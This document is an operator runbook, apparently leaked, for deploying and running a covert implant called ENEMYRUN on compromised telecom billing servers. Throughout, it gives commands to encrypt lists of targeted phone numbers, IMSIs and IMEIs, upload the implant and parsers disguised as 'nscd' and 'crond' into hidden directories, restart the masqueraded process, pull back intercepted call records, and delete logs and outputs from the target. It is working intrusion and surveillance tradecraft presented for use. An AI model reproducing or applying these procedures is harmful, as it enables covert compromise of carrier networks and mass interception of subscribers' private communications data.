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Created December 17, 2016 00:49
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#### ENEMYRUN ####
## copy and paste this into the window if you want syntax highlighting:
## it makes scripts a bit easier to read
:syntax on
## ER SETUP ##
## only get an encryption key value, if you don't already have one, ask first
#md5sum /current/down/tcpdump.raw
## vi Search/Replace commands:
## projectName - self explanatory, all CAPS
## date field - today's date, used for output files
## hostname.ip - hostname of the box and IP address exactly as displayed in nopen window title bar
## or as seen in /current/down
## cryptkey - encryption key (already have one, or use output from below md5sum command)
## copy the ER directory "er_PROJECTNAME" from the project's /targets/<proj_name>/sustained directory
## to /current/down and make sure there are no tarballs in /current/down
cp -r /mnt/zip/er_PROJECTNAME /current/down
cd /current/down/er_PROJECTNAME
## save the encryption key locally in /current/down
## whether you have a new or old key:
echo CRYPTKEY > /current/down/cryptkey.enemyrun.DDMonYY
## copy key to ER directory if creating a new key
echo CRYPTKEY > /current/down/er_PROJECTNAME/cryptkey.enemyrun.DDMonYY
## implant hidden directory for script commnads
## location is implant dependent
## Solaris - /platform/SUNW,SystemEngine/kernel/drv
## Linux - (hidden independently; should be on plan, or check old opnotes)
## STOICSURGEON: (hidden directory is displayed at beginning of FTSHELL/ish callback)
## no trailing /
## prepare files containing numbers to search for:
## if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
## prep the argfiles:
## make sure the files are ASCII and contain NO EMPTY LINES!!
## make sure the last line does not contain a null character at the end
## (vi the file, add a carriage return to the last line, then delete the empty
## line and save)
## "file" results:
## this will not work: ASCII text, with CRLF line terminators
## this WILL: ASCII text
cat arg*
file arg*
dos2unix arg*
file arg*
## if no data media is provided:
## locally, create a file of numbers to grep for with each number on a separate line
## make sure there are NO EMPTY LINES!!!!
## Format of each type of argument:
## p123456789 - phone number
## s123456789 - IMSI
## e123456789 - IMEI
## c123/456 - Cell/LAC (no leading 0's)
cd /current/down/argfiles
vim /current/down/argfiles/argfile1.txt
## encrypt argfiles / target files
## encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
## if cryptTool not in PATH, change your PATH or insert full path in command
## to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b
## to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
## on target look at CDR directories:
## - use the following commands to determine the location of current CDR data storage
## - once you identify the location of the data, you'll use the head/tail commands
## to determine the date ranges being saved
## - these date ranges will be used as settings in the ER configuration file(s)
## typical file locations per host:
######################### aromaseal:
######################### desertvista:
-lt /var/archive/output_billing
-vget /var/archive/output_billing/
######################### diamondaxe:
########################## editionhaze:
## billing02
ls -latr /d08/saba/CDR/out/MS* | head -10
ls -latr /d08/saba/CDR/out/MS* | tail -10
ls -latr /d08/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## serenecosmos:
ls -latr /var/opt/archive/tape/*/*_S_*.gz | head -10
ls -latr /var/opt/archive/tape/*/*_S_*.gz | tail -10
########################## sicklestar:
## magnum: CURSEHAPPY not working on all SS .usd files :-(
## Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
## if none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
######################### qualitygel:
########################## wholeblue:
## tpmw01
## tpmw02
## verifies isb, khi, and lhr directories:
ls -ld /tp/med/datastore/collect/siemens_msc_*
ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr
ls -ld /tp/med/archive/collect/siemens_msc_*
ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr
## shows oldest and newest files in directories:
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10
## isbapro1
## nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -10
-lt /u03/archive/collect
## newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
## old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
## cd to hidden directory where ENEMYRUN is set up
## when in the hidden directory, there could be two subdirectories;
## one for a forward instance and one backward (e.g. erf and erb)
## there should be files in:
## er*/aux_*/output/final
## and possibly if parsing is occuring:
## er*/aux_*/output
-ls -R er*
## stop current instances on ENEMYRUN
## need name of process ENEMYRUN is running as on target; should be on plan, or check old opnotes
## ER_PROCESS_NAME: name under which ENEMYRUN is running on target; try nscd which will look like ./nscd
ps -ef | grep nscd
## kill with SIGTERM; if it doesn't work use kill -9
## ENEMYRUN_PID: process id under which ENEMYRUN is running on target
## collect parsed CDRs and logs created from the backward directory
## files are encrypted
-get IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
-get IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## in a local window make sure you have them all:
## clean ER directories
## remove parsed CDRs
rm -fr IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
## remove old logs
rm -f IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## remove the status.log file >>>ONLY<<< from the >>>BACKWARDS<<< directory
rm -f IMPLANT_HIDDEN_DIRECTORY/erb/status.log
-ls -R er*
## edit ER configuration files
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should usually not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## probably have to change START_DAY and STOP_DAY
## START_DAY: YYYYMMDD # day backwards in time from which to start
## STOP_DAY: YYYYMMDD # day forwards from START_DAY: to stop
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files and save
## encrypt required ER files
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_bwd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_fwd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## --------------- ##
## --------------- ##
## put up encrypted files
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erb/adm1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_bwd.enc IMPLANT_HIDDEN_DIRECTORY/erb/ecb
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
L='-I ecb -k CRYPTKEY'; export L; ./nscd
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## pid:
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>.*
-ls -R erb
## -------------- ##
## -------------- ##
## put up encrypted files
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1
## or
-put /current/down/argfiles/argfile_forward.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_fwd.enc IMPLANT_HIDDEN_DIRECTORY/erf/ecf
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
L='-I ecf -k CRYPTKEY'; export L; ./nscd
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## pid: ER_PID
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>.*
-ls -R erf
## once all required ER instances are running, you're done
-cd /tmp
## decrypt parsed CDRs locally
## single aux* directory
## and/or
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/final
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.txt -k CRYPTKEY -d -c -b ; done
## multiple aux* directories
mkdir /current/down/coll
cp /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*/aux*/output/final/* /current/down/coll
cd /current/down/coll
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.txt -k CRYPTKEY -d -c -b ; done
## copy decrypted data to media / remove ER tar from /current/down
ls -la *.txt
cp *.txt /mnt/zip*/PROJECTNAME
ls -la /mnt/zip*/PROJECTNAME
rm /current/down/er_*.tar
## DEPLOY ##
## edit ER configuration files
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files
## encrypt required ER files
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_bwd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_fwd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## encrypt CURSEHAPPY definition file if using CURSEHAPPY
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -la
file /current/up/cursedefs/*.enc
## put up directories and tools only if deploying ENEMYRUN
## this means only put up these files/tools if they are not on the target yet
## if you have the least doubt about what you're doing, find someone who knows
## --------------- ##
## --------------- ##
-put /current/down/er_PROJECTNAME/erb_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erb.tar
tar xvf erb.tar
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erb/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/nscd
## if everything looks good remove tar
## -------------- ##
## -------------- ##
-put /current/down/er_PROJECTNAME/erf_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erf.tar
tar xvf erf.tar
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erf/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/nscd
## if everything looks good remove tar
## to continue the setup process go to the COLLECT section item titled:
## "edit ER configuration files"
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